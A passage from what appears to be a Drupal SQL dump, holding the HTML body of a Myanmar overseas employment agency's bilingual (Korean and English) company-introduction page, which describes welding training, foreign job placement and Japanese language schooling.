style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받알 수 있도록&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스들을 제공하고 있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">New Comet Trading Agency Co.ltd</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">젊은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">치누들이 일본의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개발한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">첨단</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기술을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배우고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">꿈을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">실현할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고 돕고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본으로 취업비자</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">연수비자로 가기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">필요한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">자격시험</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(JLPT, JFT, NAT-TEST, TOP-J)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">합격할</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">어학당도</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">개설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및 교육을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">지원하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희는</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">”</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>”&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-bidi-font-weight:bold;mso-fareast-language:KO;\" lang=\"KO\">는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">미얀마에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">우수한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기능인력을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">배출하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">해외로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">파견하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하기</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">위해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">끊임없이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">노력하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 1, 86, 'ja', 0, '<h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><h3>안녕하세요.우리\"뉴코멧 영업 대행사\" 웹사이트 에서 환영합니다.</h3><img src=\"/sites/default/files/inline-images/new_comet_trading_agency_0.jpg\" data-align=\"center\" data-entity-uuid=\"42e9d2a3-e284-49bb-81cb-2510b37a5871\" data-entity-type=\"file\"><p><span style=\"font-size:14.0pt;line-height:107%;\">We, ``NEW COMET TRADING\'\' company, was established in 2004 and started operating with company registration number (295/2004-2005).</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) licence was obtained in 2023 and since then, the company has started to carry out service activities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">&nbsp;We, ``NEW COMET TRADING AGENCY\'\' company, which is a brother company, such as, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, NEW COMET Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan, and have paid the taxes set for the state. More than 100 employees were given employment opportunities.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.</span></p><p><span style=\"font-size:14.0pt;line-height:107%;\">Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard under the Ministry of Transport and Communications for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, and Japan.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We at NEW COMET TRADING AGENCY Co.Ltd, are assisting on responsible for learning about Japan\'s developed advanced technologies, cultures and expressing their personal abilities and goals for the young generation in Myanmar.&nbsp;</span></p><p><o:p></o:p><span style=\"font-size:14.0pt;line-height:107%;\">In order to successfully pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.</span><o:p></o:p></p><p><span style=\"font-size:14.0pt;line-height:107%;\">We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</span></p><p>&nbsp;</p><h3>안녕하세요.우리 웹사이트 \"뉴코멧 영업 대행사\" &nbsp;에서 환영합니다.</h3><p>&nbsp;</p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> ``New Comet Trading\'\'&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2004</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">설립되어</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업자등록번호</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">(295/2004-2005)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">로</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">영업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧무역대행</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 2023</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">뉴코멧</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">외국인고용업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">면허를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취득하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">서비스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun 